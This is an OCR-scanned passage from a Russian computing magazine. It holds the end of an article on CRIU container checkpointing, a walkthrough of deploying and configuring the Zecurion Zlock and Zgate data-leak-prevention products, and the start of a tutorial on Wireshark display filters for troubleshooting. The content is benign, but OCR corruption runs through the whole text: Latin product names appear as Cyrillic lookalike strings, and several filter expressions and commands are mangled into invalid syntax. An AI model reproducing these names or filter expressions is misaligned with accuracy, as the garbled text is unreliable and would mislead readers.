состояние сохраняется между перезагрузкой ядра через кехес), 
далее новое ядро загружается с помощью кехес, и состояние кон- 
тейнеров восстанавливается из ргапггіз. 

Ключевое значение здесь имеют СРЮ и ргагтгіз, потому что, 
со слов разработчиков, сам дамп состояния происходит очень 
быстро и обычно все упирается в производительность диска, 
тогда как в ргагт^з сохранение происходит со скоростью работы 
оперативной памяти, что дает заметный выигрыш в скорости дампа 
и восстановления. 



ВЫВОДЫ 



СРЮ до сих пор находится в активной стадии разработки, но уже 
даже сейчас он позволяет замораживать многие приложения, 
среди которых есть и целые контейнеры. Пока есть некоторые 
проблемы с графическими приложениями, однако, надо пола- 
гать, их вскоре исправят, учитывая опыт и способности програм- 
мистов из РагаІІеІз. ос 
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В современных условиях предот- 
вратить утечки различной конфи- 
денциальной информации, включая 
персональные данные, — задача, 
актуальная как никогда. Поэтому 
сегодня мы подробно рассмотрим, 
как можно организовать комплекс- 
ную защиту корпоративной инфор- 
мационной системы от этого вида 
угроз средствами 2есигіоп 01_Р. 
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Консоль управления продуктами 2есигіоп 




21оск: добавление устройств в политику 



ВВЕДЕНИЕ 



Все каналы утечки конфиденциальной инфор- 
мации можно разделить на две большие груп- 
пы. К первой относятся устройства, которые 
подключаются к рабочим станциям сотрудни- 
ков или серверам непосредственно или через 
локальную сеть. В основном это всевозможные 
накопители, мобильные телефоны и смартфо- 
ны, принтеры и прочее. 

Каналы утечки, относящиеся ко второй 
группе, обычно называют сетевыми. Хотя 
правильнее было бы называть их интернет- 
каналами. Ведь сюда входят электронная 
почта, ІМ-клиенты, 5куре, всевозможные 
веб-сервисы, РТР-серверы, в общем — все, 
что позволяет отправить информацию через 
интернет. А вот, к примеру, сетевые принтеры, 
работающие в пределах информационной 
системы компании, считаются локальным 
каналом утечки. 

Каналы из разных групп принципиально 
отличаются друг от друга. А потому для пре- 
дотвращения утечек по ним используются 
абсолютно разные подходы. Для локальных 
устройств необходима специальная програм- 
ма-агент. Она должна быть запущена непо- 
средственно на рабочей станции или сервере 
и иметь достаточные привилегии, чтобы 
управлять доступом пользователей к устрой- 
ствам. В зависимости от загруженных в нее 
политик программа-агент может блокировать 
работу тех или иных накопителей, предотвра- 
щать печать конфиденциальной информации 
и прочее. 

Контроль каналов утечки из сетевой группы 
требует иного подхода. Для его организации 
необходимо шлюзовое решение, которое 
способно пропускать через себя весь внешний 
трафик (как входящий, так и исходящий). Этот 
трафик разбивается по протоколам и анализи- 
руется. В результате система проверяет прохо- 
дящую через нее информацию на соответствие 
заданным политикам. 

В 2есигіоп 01.Р ( ѵѵѵт.гесигіоп.ги ) проблема 
разных подходов реализована путем создания 
двух продуктов: 21оск и 2даІе. Каждый из них 
работает независимо от другого, однако оба 
они управляются с одной консоли управления, 



обладают схожими интерфейсами, инстру- 
ментами анализа и принципами настройки. 

Это позволяет создать единое рабочее место 
администратора безопасности, с которого 
он может управлять всей системой защиты 
от утечек конфиденциальной информации. 

Такой подход удобен тем, что не обязывает 
компанию приобретать полную систему защи- 
ты, если она ей не нужна. Например, для сетей, 
не подключенных к интернету, в шлюзовой 
части решения нет никакого смысла. Ну или 
же компании могут внедрять систему защиты 
поэтапно, сначала организовав контроль 
локальных устройств, а потом добавив к нему 
мониторинг интернет-сервисов. 

Теперь можно переходить к практике. Из-за 
значительных различий в принципах функ- 
ционирования 21оск и 2даІе развертывание 
и настройку каждого из них мы будем рассма- 
тривать отдельно. 



РАЗВЕРТЫВАНИЕ 2ЕСУРІОЫ 21.0СК 



Процедура развертывания 21оск начинается 
с инсталляции серверных компонентов. Они 
необходимы для обеспечения централизован- 
ного управления системой защиты, хранения 
теневых копий и информации о зарегистри- 
рованных агентами событиях. Сам процесс 
установки ничем не отличается от традици- 
онного. Единственное, на что нужно обратить 
пристальное внимание, — выбор компонентов. 
Основные из них — «Сервер конфигураций» 
и «Сервер журналов». Первый необходим 
для централизованного управления конфи- 
гурациями агентов, а второй — для создания 
общего хранилища теневых копий и информа- 
ции о событиях. Они должны быть установлены 



непосредственно на сервере. В крупных сетях 
также имеет смысл инсталлировать компонент 
«Оснастка настройки 21оск для групповых 
политик». 

Компонент «Консоль управления» нужно 
установить на рабочей станции администра- 
тора. Ну или на нескольких компьютерах, если 
ответственных за безопасность айтишников 
несколько. В небольших компаниях консоль 
управления может также использоваться 
непосредственно на сервере. Последний 
входящий в состав дистрибутива компонент — 
«Клиентский модуль». Именно он и является 
программой-агентом для рабочих станций. 

После установки серверных компонентов 
необходимо развернуть агенты на все нужда- 
ющиеся в контроле рабочие станции и сер- 
веры корпоративной сети. Сделать это можно 
двумя способами. Первый из них — ручная 
установка из дистрибутива. Второй — исполь- 
зование групповых политик домена ѴѴіпсіоѵѵб. 
Преимущества и недостатки каждого из них 
настолько очевидны, что говорить о них мы 
не будем. 

После инсталляции всех компонентов 21оск 
можно переходить к первичной настройке си- 
стемы защиты с помощью консоли управления 
(через нее ведутся и все остальные операции 
управления). При ее первом запуске пользо- 
вателю автоматически предлагается создать 
цифровой сертификат, содержащий закрытый 
и публичный ключи. Он необходим для обеспе- 
чения защиты информации, которой обме- 
ниваются сервер и агенты в рамках работы 
с запросами пользователей на подключение 
устройств. При необходимости в будущем этот 
сертификат можно изменить. 



ПРИ ПЕРВОМ ЗАПУСКЕ КОНСОЛИ 
УПРАВЛЕНИЯ 2І.0СК ПРЕДЛАГАЕТ СОЗДАТЬ 
ЦИФРОВОЙ СЕРТИФИКАТ, СОДЕРЖАЩИЙ 
ЗАКРЫТЫЙ И ПУБЛИЧНЫЙ КЛЮЧИ 
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21оск: настройка правил работы политики 

Панель управления состоит из двух частей. 

В левой отображается список доступных ком- 
пьютеров. Он может загружаться как из Асііѵе 
Рігесіогу, так и с помощью МеШІОЭ. По умолча- 
нию все компьютеры сгруппированы по уста- 
новленным на них приложениям (серверы 
в одной группе, машины с установленными 
приложениями в другой, компьютеры без про- 
дуктов Еесигіоп в третьей и так далее). Также 
есть возможность просмотра в другом режиме. 

В этом случае все компьютеры выводятся еди- 
ным списком (возможно с делением на группы, 
если такое предусмотрено в домене компании), 
а в каждом из них отображаются установлен- 
ные приложения. Администратор безопасности 
может подключиться к любому компьютеру, 
если на нем установлен хотя бы какой-то 
модуль 2есигіоп. При этом в правой части по- 
является возможность работы с этим модулем. 

После первого запуска консоли управле- 
ния в первую очередь необходимо установить 
права доступа к 21оск. По умолчанию система 
настроена так, что локальный администратор 
имеет полные возможности по управлению 
защитой. Однако это будет необходимо ис- 
править, если в компании функции системного 
администратора и администратора безопас- 
ности разделены. Выдавать доступ можно 
как на основе групп и имен пользователей 
ѴѴіпбоѵѵз, так и вводя собственные аккаунты 
для продуктов 2есигіоп. Права можно настро- 
ить весьма гибко, указав разрешенные опе- 




рации: изменение политик доступа, просмотр 
журналов и прочее. 

В ходе первичной настройки необходимо 
определить параметры теневого хранилища. 
Это нужно для включения в политики теневого 
(незаметного для пользователей) копирования 
файлов. Что позволит администратору безо- 
пасности контролировать передачу на носите- 
ли или распечатку даже тех документов, кото- 
рые удовлетворяют политикам безопасности. 

В качестве хранилища может использоваться 
локальная папка (она недоступна для самих 
пользователей) или папка на сервере. 

Также можно настроить систему монито- 
ринга. Она позволяет автоматически с задан- 
ным интервалом времени опрашивать агенты 
и отслеживать таким образом их состояние. 

С мониторингом можно связать автоматиче- 
ское обновление конфигураций, загруженных 
в клиентские программы. 

В последней версии ІІоск появилась еще 
одна интересная возможность. Речь идет 
о принудительном шифровании информации, 
записываемой на съемные накопители. Это 
позволяет организовать безопасный пере- 
нос данных на флешках даже помимо воли 
сотрудников. Если в компании планируется 
использовать эту возможность, то в процес- 
се предварительной настройки необходимо 
сгенерировать ключ шифрования. Сделать это 
можно, подключившись к серверу конфигура- 
ций. 



В ПОСЛЕДНЕЙ ВЕРСИИ 2ЮСК ПОЯВИЛАСЬ 
ВОЗМОЖНОСТЬ ПРИНУДИТЕЛЬНОГО 
ШИФРОВАНИЯ ИНФОРМАЦИИ, ЗАПИ- 
СЫВАЕМОЙ НА СЪЕМНЫЕ НАКОПИТЕЛИ 



В ПОИСКАХ 

СЕКРЕТНЫХ 

ДАННЫХ 

Помимо 21оск и 2да1е, в состав 2еси- 
гіоп РІ_Р входит еще один продукт — 
2бі5СОѵегу. Он предназначен 
для мониторинга распространения 
конфиденциальной информации 
по локальной сети. С его помощью 
можно находить секретные данные 
на любых хранилищах (серверах, 
рабочих станциях пользователей, 
МА5 и прочих). Это позволяет 
отыскивать нелегитимные их копии 
и удалять или перемещать их, 
значительно уменьшая риск утечки 
конфиденциальной информации. 




НАСТРОЙКА 2ЮСК 



Настройка 21оск предполагает создание набо- 
ра политик безопасности, которые описывают 
правила доступа сотрудников к тем или иным 
устройствам. Таких политик может быть не- 
сколько. Каждая из них обладает собственным 
приоритетом, который определяет порядок 
их применения. Такой подход позволяет 
создать очень гибкие условия доступа. Если 
устройство подходит под несколько политик, 
то будет применяться та из них, которая имеет 
максимальный приоритет. Также в 21оск есть 
политика по умолчанию. Она используется 
для задания прав доступа к тем устройствам, 
которые не попали ни под одну другую. 

Политики безопасности в рассматриваемой 
программе делятся на два типа. Первые опре- 
деляют права на уровне устройства. Проще 
говоря, они позволяют полностью запретить 
или разрешить подключение какого-то обо- 
рудования. При этом для накопителей есть до- 
полнительная возможность — открыть доступ 
только для чтения. 

При создании такой политики в первую 
очередь указываются устройства, для которых 
она работает. Их можно выбирать из списка 
типовых (например, инфракрасные порты, мо- 
демы, съемные накопители, принтеры). Также 
можно указывать физическое устройство или 
целый их класс из перечня подключенного 
к компьютерам оборудования или каталога 
устройств (в этот каталог можно добавить 
и в будущем использовать для создания поли- 
тик все оборудование компании, подключен- 
ное к разным ПК). Отдельно в список вносятся 
принтеры и 1)5В-устройства с заданными 
характеристиками (флешки определенных 
производителей, моделей или даже конкрет- 
ные устройства). 

Далее указываются настройки доступа. 

Как мы уже говорили, это может быть полный 
запрет или же разрешение на чтение или 
чтение и запись. Примечательно, что права 
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21оск: настройка политики контроля файлов по содержимому 



можно задавать с привязкой к пользователям. 
То есть некоторым группам сотрудников можно 
разрешить чтение с флешек, отдельным от- 
ветственным лицам — чтение и запись, а всем 
остальным вообще закрыть доступ к устрой- 
ствам этого типа. 

При необходимости дополнительно мож- 
но задать расписание действия политики 
по дням, неделям или месяцам. Также можно 
указать правила ее работы. Они определяют 
активность политики в зависимости от до- 
ступности домена: когда рабочая станция 
подключена к домену локально, через ѴРМ или 
работает автономно. Это особенно актуально 
для ноутбуков, которые сотрудники могут вы- 
носить за пределы офиса. 

В завершение настройки политики можно 
определить параметры контроля копируемых 
файлов. Такие функции, как журналирование 
событий, теневое копирование и шифрование, 
включаются, отключаются и настраиваются 
независимо друг от друга. 

Вторая группа политик — политики контро- 
ля файлов. С их помощью можно определять 
права доступа в зависимости от типа или 
содержимого документов. При использовании 
таких политик подключенные к компьютерам 
сотрудников накопители и принтеры доступны. 
Однако скопировать на них или распечатать 
получится не любые, а только удовлетворя- 
ющие правилам файлы. Политики контроля 
файлов также могут быть привязаны к поль- 
зователям и их группам. Это обеспечивает 
необходимую гибкость системы защиты. 

При создании политики второго типа 
в первую очередь необходимо определить 
тип контроля — по типу файлов или по их 
содержимому. При выборе первого варианта 
в списке поддерживаемых форматов нуж- 
но просто включить требуемые пункты. Это 
могут быть как отдельные типы, так и целые 
их группы, например текстовые документы, 
архивы, видеофайлы и прочее. Стоит отметить, 



что 21оск определяет формат не по расшире- 
нию, а по содержимому файлов, сравнивая его 
с сигнатурами. 

Второй вариант контроля используется 
только для документов, содержащих текст. 

Он позволяет разрешать или запрещать 
копирование файлов в зависимости от их со- 
держимого. Правил анализа в одной политике 
может быть несколько. Это дает возможность 
использовать в одной политике сразу несколь- 
ко разных инструментов исследований. 

Всего в данном виде политик может при- 
меняться три разных типа анализа. Первый 
из них — «Содержит текст». Как видно 
из названия, политика будет срабатывать 
в том случае, если в исследуемом документе 
будут обнаружены заданные слова. При этом 



2Іоск: выбор действий политики контроля файлов 
по содержимому 



слова могут искаться точно в заданном виде, 
с учетом морфологии, стемминга (обработки 
окончаний), транслитерации и подстановочных 
символов. Второй инструмент во многом похож 
на первый. Воттолько при его использовании 
происходит поиск не отдельных слов и вы- 
ражений, а слов из предварительно заданного 
словаря. Таких словарей в системе может быть 
произвольное количество. Каждый из них 
должен содержать слова, которые позволяют 
отнести исследуемый текст к той или иной 
категории. 

Третий способ контекстного анализа — по- 
иск по шаблону. В нем используются шабло- 
ны — наборы обычных и подстановочных 
символов. Такой вариант оптимален для по- 
иска любой формализованной информации. 

И особенно хорош для контроля передачи 
персональных данных: номеров телефонов, 
паспортных данных, ИНН и прочего. Кстати, 
в комплект поставки уже входит целый набор 
шаблонов наиболее распространенных персо- 
нальных данных. 

В завершение настройки политики кон- 
троля файлов необходимо определить ее дей- 
ствия. Для чтения файлов со съемных накопи- 
телей это может быть запрет или разрешение 
с журналированием или без него. Для записи 
дополнительно появляется возможность 
теневого копирования и принудительного 
шифрования. Для печати документов доступны 
запрет и разрешение. Также для распечаток 
можно включить журналирование и теневое 
копирование. 

После создания всех необходимых политик 
их нужно загрузить в установленные агенты. 
Сделать это можно несколькими способами. 
Самый простой — прямо через консоль управ- 
ления. Для этого достаточно выбрать нужные 
компьютеры и выполнить специальную 
операцию — «Распространить конфигурацию». 



2да(е: настройка режима контроля почты 
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2да1е: пример политики контроля 



Второй вариант предполагает использование 
групповых политик \Л/іпсіоѵѵ5. В этом случае 
создается специальный файл с конфигураци- 
ей, который и распространяется на компьюте- 
ры конечных пользователей. Третий вари- 
ант — использование возможностей сервера 
конфигураций. Можно загрузить в него набор 
политик и указать настройки получения 
списка компьютеров и серверов. После этого 
модуль будет самостоятельно отслеживать 
ситуацию и автоматически загружать со- 
ответствующие конфигурации на все, в том 
числе и на вновь появляющиеся компьютеры. 
Его использование позволяет значительно 
уменьшить количество рутинных операций 
и тем самым упростить работу администратора 
безопасности. 



РАЗВЕРТЫВАНИЕ 2ЕСУВІ0М 26 АТЕ 



2даіе — шлюзовое решение для контроля се- 
тевого трафика. В его дистрибутив входиттри 
модуля. Два уже знакомы нам: это сервер жур- 
налов и консоль управления. Если они были 
развернуты при настройке 21оск, то их можно 
уже не устанавливать. Третий модуль — сам 
сервер 2даІе. Он предназначен для анализа 
трафика и является основной частью системы 
защиты. 

Сама процедура установки не представляет 
особого интереса, ее мы опустим. А вот на чем 
стоит заострить внимание, так это на вы- 
боре режима работы системы защиты. Дело 



в том, что рассматриваемое решение может 
работать двояко. С одной стороны, 2даІе может 
выступать в роли прокси-сервера. В этом 
случае он получает возможность фильтровать 
трафик, выявляя и не выпуская конфиденци- 
альную информацию из корпоративной сети. 

С другой стороны, 2даІе может работать только 
с зеркалированным трафиком. В этом случае 
он не может предотвращать утечки данных, 
а только фиксирует инциденты. 

На первый взгляд кажется, что выбор впол- 
не очевиден. Лучше предотвращать утечки 
конфиденциальных данных, нежели просто 
фиксировать их. Однако на самом деле работа 
в режиме прокси-сервера может помешать 
нормальному протеканию бизнес-процессов 
компании. Например, при высокой нагрузке 
или каком-либо сбое 01_Р-система, работа- 
ющая в режиме прокси-сервера, может пре- 
рвать доступ к интернету. Кроме того, нельзя 
забывать, что контекстный анализ, который 
используется для исследования трафика, 
зачастую носит вероятностный характер. По- 
этому всегда существует риск того, что систе- 
ма защиты заблокирует вполне легитимную 
передачу информации. Именно поэтому 
в большинстве крупных компаний шлюзовые 
01_Р-решения работают только с зеркалиро- 
ванным трафиком. 

В том случае, если был выбран вариант 
с фильтрацией трафика, 2даІе должен быть 
установлен как прокси-сервер между корпо- 



ЕСТЬ РИСК ТОГО, ЧТО СИСТЕМА ЗАЩИТЫ 
ЗАБЛОКИРУЕТ И ЛЕГИТИМНЫЕ ДАННЫЕ. 
ПОЭТОМУ НА ПРОДАКШНЕ БІ.Р РАБОТАЮТ 
ТОЛЬКО С ЗЕРКАЛИРОВАННЫМ ТРАФИКОМ 




2даІе: настройка режима контроля веб-каналов 

ративным почтовым сервером и интернетом. 
Таким образом, он будет обрабатывать всю 
как исходящую, так и входящую корреспон- 
денцию. Фильтрация веб-трафика возможна 
на ІСАР-совместимом прокси-сервере или 
на сервере МісгозоК Роге^гопі ТМб. 

Если было принято решение о работе в ре- 
жиме мониторинга, то необходимо обеспечить 
поступление зеркалированного трафика 
на сервер 2даІе. Для этого можно использо- 
вать разные возможности, например зеркали- 
рование с порта прослушивания коммутатора. 

В заключение процесса развертывания 
рассматриваемого решения необходимо 
выполнить его настройку — определить 
контролируемые протоколы и режимы работы, 
права доступа сотрудников, параметры ар- 
хивирования информации и журналирования 
событий. В первую очередь стоит разобраться 
с электронной почтой. Для ее настройки нужно 
выбрать соответствующий режим работы си- 
стемы (прокси-сервер, анализ зеркалирован- 
ного трафика или плагин к МісгозоК ЕхсЬапде) 
и в зависимости от него настроить параметры 
приема и передачи корреспонденции. 




2да(е: выбор действия 
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Нужно 2алатать! 



Создание условия 



Класс создаваемого условия: 



/А Контекпяяй анализ 
Поиск по словаро 
Проверка адресов 
^ Гфовеека внеіігвп приложением 
, ^Гфоверка параметров соо6ше»яяі 
л = Составное условие 
й Тип вложенного файла 



Осуществляет проверку малічия зашифрованных файлов вложеняі следующих 
типов: ООС. ООСХ, Х15, Х15Х. РРТ, РРТХ. РОР, 006. ООР, ООС, ООР, 00$. ООТ. КАЯ. 
ПР. Условие выполняется, если в гекьме содержатся зашнфрованные фай/ы. 




2да(е: выбор типа при создании условия 



2даІе: настройка контентного анализа 



Контроль веб-трафика настраивается 
отдельно по протоколам. Для каждого из них 
можно выбрать свой режим работы — зер- 
калирование или фильтрация. А контроль 
ненужных протоколов можно отключить во- 
обще. Особое внимание необходимо уделить 
разделу НТТР/НТТРБ. При его включении 
необходимо определить область контроля. 
Дело в том, что в его состав входит большое 
количество поддерживаемых рассматривае- 
мым решением сайтов и веб-сервисов. И ад- 
министратор безопасности может включать 
и выключать их независимо друг от друга. 

Это позволяет контролировать веб-почту, со- 
циальные сети, форумы и даже сайты поиска 
работы. 

Также необходимо настроить архив — 
базу данных, в которой будет сохраняться 
вся собранная информация. Для этого может 
использоваться М5 5С)І_ Бегѵег или Огасіе 
РаІаЬазе. Тут важно понимать отличие архива 
от журнала событий. Первый используется 
для хранения перехваченных писем, сообще- 
ний, отправленных через ІМ-клиенты, постов 
на форумах и в социальных сетях. А в журнале 
фиксируются заданные администратором со- 
бытия: инциденты, поступление в архив новой 
информации, изменение настроек, ошибки. 

После общей настройки системы можно 
переходить к разработке политики безопас- 
ности. Она представляет собой набор условий 
фильтрации и связанных с ними действий. 
Условий в политике может быть несколько. 

При этом администратор безопасности имеет 
возможность задать порядок их следования. 

То есть трафик поочередно проходит все про- 



верки и на любом этапе может быть признан 
нелегитимным. 

Всего в 2даІе предусмотрено восемь типов 
условий. Большая часть из них относится 
к формальным. Это проверка на наличие за- 
шифрованных файлов, проверка адресов, типа 
вложенных файлов и параметров сообще- 
ний (по ІР-адресу, размеру вложений, дате 
и времени отправки). Два типа условий ис- 
пользуются для контекстного анализа — поиск 
текста и поиск по словарю. В них применяются 
дополнительные инструменты: морфологиче- 
ский анализ, стемминг, учет транслитерации, 
ошибок, поиск по шаблону. 

Отдельного упоминания заслуживает усло- 
вие «Проверка внешним приложением». Его 
наличие позволяет существенно расширить 
функциональность системы защиты и подклю- 
чить к ней любые приложения или скрипты, 
в том числе и самостоятельно разработанные 
для конкретных условий данной компании. 
Последний тип условий — составной. В него 
можно включать условия любых других типов, 
объединяя их логическими операциями. 

Для каждого условия необходимо задать 
одно или несколько действий, которые будет 
производить система при его выполнении. 
Операций доступно много. Среди них есть 
полная блокировка соединения, автоматиче- 
ское изменение сообщений (вставка в него 
определенного текста, удаление и добавление 
вложений, изменение полей), перемещение 
в карантин и сохранение в архиве, отправка 
уведомления администратору безопасности, 
журналирование. В общем, действия преду- 
смотрены на все случаи жизни. 



Таким образом, после создания всех не- 
обходимых условий и привязки к каждому 
из них нужных действий мы получаем полно- 
ценную политику, которая может весьма гибко 
учитывать все нюансы. Такой подход позво- 
ляет уменьшить количество ложных срабаты- 
ваний системы защиты, сократив тем самым 
нагрузку на администраторов безопасности. 



подводим итоги 



Сегодня мы разобрали, как можно раз- 
вернуть в компании комплексную систему 
предотвращения утечек конфиденциальных 
данных, которая способна контролировать 
как локальные, так и сетевые каналы. Без- 
условно, данный обзор не может претендо- 
вать на полноту. Такие серьезные решения, 
как 2есигіоп ОІ_Р, обладают весьма обширным 
функционалом, рассмотреть который в одной 
статье просто-напросто невозможно. Поэтому 
за пределами обзора остались многие, без- 
условно, весьма интересные возможности. 
Например, подача запросов пользователей 
на временный доступ к устройствам в 21оск, 
контроль Бкуре и зашифрованного трафика 
в 2да1е. 

Однако и сказанного вполне достаточно, 
чтобы понять одну простую вещь. На сегод- 
няшний день защита корпоративной сети 
от утечек конфиденциальной информации — 
это не какая-то сверхсложная задача. Вне 
всякого сомнения, построение такой системы 
безопасности — процесс трудоемкий и требу- 
ющий определенных знаний. Однако при ис- 
пользовании современных решений вполне 
осуществимый собственными силами, ш 
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на чистую воду 





ВЫЖИМАЕМ 
МАКСИМУМ 
ИЗ ФИЛЬТРОВ 
ОТОБРАЖЕНИЯ 
ѴѴІКЕ5НАКК 

Для исследования поведения сетевых 
приложений и узлов, а также чтобы выявить 
неполадки в работе сети часто прибегают 
к анализаторам сетевых пакетов. Ключевые 
особенности подобного ПО — это, во-первых, 
возможности разносторонней аналитики, а во- 
вторых, многофункциональная фильтрация 
пакетов, позволяющая выудить крупицы 
интересующей информации в безбрежном 
потоке сетевого трафика. Именно последнему 
аспекту и посвящена эта статья. 



ВВЕДЕНИЕ 



Из всех методов изучения компьютерных сетей анализ трафика, 
пожалуй, самый кропотливый и трудоемкий. Интенсивные потоки 
современных сетей порождают очень много «сырого» материала, 
отыскать в котором крохи полезной информации далеко не просто. 
За время своего существования стек ТСР/ІР оброс многочислен- 
ными приложениями и дополнениями, счет которым идет на сотни 
и тысячи. Это прикладные и служебные протоколы, протоколы 
аутентификации, туннелирования, доступа к сети и так далее. 
Кроме знания азов сетевых взаимодействий, исследователю тра- 
фика (то есть тебе) нужно свободно ориентироваться во всем этом 
протокольном многообразии и уметь работать со специфичными 
программными инструментами — снифферами, или, по-научному, 
анализаторами трафика (протоколов). 

Функциональность сниффера — это не только возможность 
использования «неразборчивого» (рготізсиоз) режима работы 
сетевой карты для перехвата. Подобный софт должен уметь эффек- 
тивно фильтровать трафик как на этапе сбора, так и во время из- 
учения отдельных единиц передачи (фреймов, пакетов, сегментов, 
датаграмм, сообщений). Причем чем больше протоколов сниффер 
«знает», тем лучше. 

Современные анализаторы протоколов много чего умеют: 
считать статистику трафика, рисовать графики хода сетевых 
взаимодействий, извлекать данные прикладных протоколов, экс- 
портировать результаты работы в различные форматы... Поэтому 
подбор инструментария для анализа сетевого трафика — это тема 
для отдельного разговора. Если ты не знаешь, что выбрать, или же 
не хочешь тратить деньги на платное ПО, то воспользуйся простым 
советом: установи МігевЬагк. 
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Выводим на чистую воду 




Рис. 1. Профиль фильтров перехвата 



ЗНАКОМИМСЯ С ФИЛЬТРАМИ 



ѴѴігезЬагк поддерживает два вида фильтров: 

• перехвата трафика (саріиге ПІІегз); 

• отображения (сІІБрІауІіІІегв). 

Первая подсистема досталась ѴѴігезЬагк в наследство от би- 
блиотеки Рсар, обеспечивающей низкоуровневый АРІ для работы 
с сетевыми интерфейсами. Выборка трафика на лету во время 
перехвата позволяет экономить оперативную память и место 
на жестком диске. Фильтр представляет собой выражение, со- 
стоящее из группы примитивов, при необходимости объединенных 
логическими функциями (апгі, ог, поі]. Записывается это выраже- 
ние в поле «Саріиге РіІІег» диалогового окна «Саріиге орііопз». 
Наиболее употребляемые фильтры можно сохранять в профиле 
для повторного использования (рис. 1). 

Язык фильтров перехвата стандартный для мира Ореп Боигсе 
и используется многими Рсар-основанными продуктами (напри- 
мер, утилитой Ісрсіитр или системой обнаружения/предотвра- 
щения вторжений Бпогі). Поэтому описывать синтаксис здесь нет 
особого смысла, так как он тебе, скорее всего, знаком. А детали 
можно посмотреть в документации, например в Ыпих на странице 
справочного руководства рсар-1і11ег(7). 

Фильтры отображения работают с уже перехваченным трафиком 
и являются «родными» для ѴѴігезЬагк. Отличия от Рсар — в фор- 
мате записи (в частности, в качестве разделителя полей исполь- 
зуется точка); также добавлены английская нотация в операциях 
сравнения и поддержка подстрок. 

Вписать фильтр отображения можно прямо в соответствую- 
щее поле (внимание, работает выпадающий список-подсказка) 
главного окна программы после кнопки «РіІІег» (кстати, под 
этой кнопкой скрывается профиль для часто используемых вы- 
ражений). А если кликнуть расположенную неподалеку кнопку 
«Ехргеззіоп...», то откроется многофункциональный конструктор 
выражений (рис. 2). 

Слева (Ріеісі Мате) представлено упорядоченное по алфа- 
виту дерево полей сообщений протоколов, которые известны 
ѴѴігезИагк. Для данного поля можно указать логический оператор 
(Веіаііоп), вписать значение (Ѵаіие), указать диапазон (Вапде) или 
выбрать значение из списка (Ргесіеііпесі Ѵаіие). В общем, полная 
сетевая энциклопедия в одном окошке. 

Вот логические операторы, используемые в фильтрах ото- 
бражения: 



• апсі(&&)— «И»; 

• ог (||) — «ИЛИ»; 

• хог( лл ) — исключающее «ИЛИ»; 

• поі (!) — отрицание; 

• [...] — выборка подстроки. 

• Фильтруя по МАС-адресу своего сетевого адаптера, 

• исключаем весь локальный трафик 
по* (еТИ.асИг ед аа:ЬЬ:сс:22:33:44) 

• Отметаем весь «служебный шум», чтобы сконцентрироваться 

• на интересующем нас трафике 
!(агр ог істр ог сіпб) 

Что касается выборки подстроки, то это не совсем логическая 
операция, но весьма полезная опция. Она позволяет получить 
определенную часть последовательности. Например, так можно 
использовать в выражении первые (первое число в квадратных 
скобках — смещение) три байта (число после двоеточия — длина 
подпоследовательности) поля МАС-адреса источника: 

еТб. 5гс[0:3] == 00:19:5Ь 

В выборках с двоеточием один из параметров можно опускать. Если 
пропустить смещение, то отсчет выборки начнется с нулевого байта. 
Если длину — то получим все байты от смещения до конца поля. 

К слову, выборку подстроки удобно использовать для выявле- 
ния малвари в случае, если известна последовательность байт, 
идущая после заголовка (например, «0x90, 0x90, 0x90, 0x04» в ІІОР- 
пакете): 

исІр[8:4] == 90:90:90:04 

Операции сравнения, используемые в логических выражениях: 

• ед (==)— равно; 

• пе (!=) — неравно; 

• дІ(>) — больше; 

• Іі(<) — меньше; 

• де (>=) — больше или равно; 

• Іе (<=) — меньше или равно. 

■Ьср.ДБТрогТ пе 8080 && 1:ср.1еп е* 0 && ОаТа[0] ед А0 

Собственно, теории для начала достаточно. Дальше исполь- 
зуй здравый смысл и скобки по необходимости и без нее. Также 
не забывай, что фильтр по сути — логическое выражение: если оно 
истинно, то пакет отобразится на экране, если ложно — нет. 




Рис. 2. Конструктор фильтров отображения 
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ИЩЕМ УГОНЩИКА ІР-АДРЕСА 



В сегменте локальной сети случаются (по тем или иным причинам) 
совпадения ІР-адресов у двух и более узлов. Методика «отлова» 
(определения МАС-адресов) конфликтующих систем общеизвест- 
на: запускаем на третьем компьютере сниффер, чистим АВР-кеш 
и стимулируем запрос на разрешение МАС'а искомого ІР, например 
пропинговав его: 

# агр -сі 192.168.56.5 

# ріп§ -п -с 1 192.168.56.5 

А потом ищем в перехваченном трафике, с каких МАС'ов пришли 
ответы. Если ѴѴігезЬагк наловил слишком много пакетов, создаем 
фильтр отображения с помощью конструктора. В первой части вы- 
ражения выбираем АВР-ответы, во второй —те сообщения, в ко- 
торых исходный ІР-адрес равен искомому. Примитивы объединяем 
оператором &&, так как нужно, чтобы оба условия выполнялись 
одновременно: 

(агр.орсосіе == геріу) && (агр.5гс.рго1:о_ірѵ4 == - 
192.168.56.5) 

Кстати, при выполнении этого сценария ни одна компьютерная 
сеть не пострадала, потому что были использованы две вирту- 
альные машины Огасіе ѴИиаІВох и сетевое подключение типа 
«Виртуальный адаптер хоста». 



ИНСПЕКТИРУЕМ СЕТЕВОЙ I 
И ТРАНСПОРТНЫЙ УРОВНИ 



До сих пор достаточно эффективным средством диагностики сете- 
вого стека остается протокол ІСМР. Из сообщений этого протокола 
можно получить ценную информацию о проблемах в сети. 

Как ты уже догадался, отфильтровать ІСМР в ѴѴігезЬагк очень 
просто. Достаточно в строке фильтрации в главном окне програм- 
мы написать: істр. Кроме істр, работают и многие другие ключе- 
вые слова, являющиеся именами протоколов, например агр, ір, Іср, 
исір, 5птр, зтЬ, Мір, Кр, ззЬ и другие. 

Если ІСМР-трафика много, то отображение можно детализиро- 
вать, исключив, например, эхо-запросы (тип 0) и эхо-ответы (тип 8): 

істр апсі ((істр. Туре пе 0) апсі (істр. Туре пе 8)) 

На рис. 4 показан пример небольшой выборки ІСМР-сообщений, 
созданных тестовым Ыпих-маршрутизатором. Сообщение «Рогі 
ІІпгеасЬаЫе» обычно используется по умолчанию. Оно же генери- 
руется сетевым стеком при получении ІЮР-датаграммы на не- 



используемый порт. Чтобы виртуальный роутер на основе йеЬіап 
начал отдавать сообщения «Нозі ипгеасЬаЫе» и «Соттипісаііоп 
асітіпізігаііѵеіу ЫіегесІ», пришлось с ним повозиться. Сізсо же 
информирует об административной фильтрации обычно по умолча- 
нию. Сообщение «Тіте-Іо-Ііѵе ехсеесіеО» говорит о наличии петли 
на каком-то участке сети (ну и при трассировке маршрута такие 
пакеты также могут появляться). 

Кстати, о межсетевых экранах. Создавать правила для популяр- 
ных файеров можно прямо в ѴѴігезЬагк, используя пункт «РігеѵѵаІІ 
АСІ_ Риіез» меню «Тооіз». Предварительно нужно выбрать в списке 
пакет, информация которого будет использована. Доступны стан- 
дартные и расширенные АСЕ Сізсо, правила ІІМІХ-Ііке продуктов ІР 
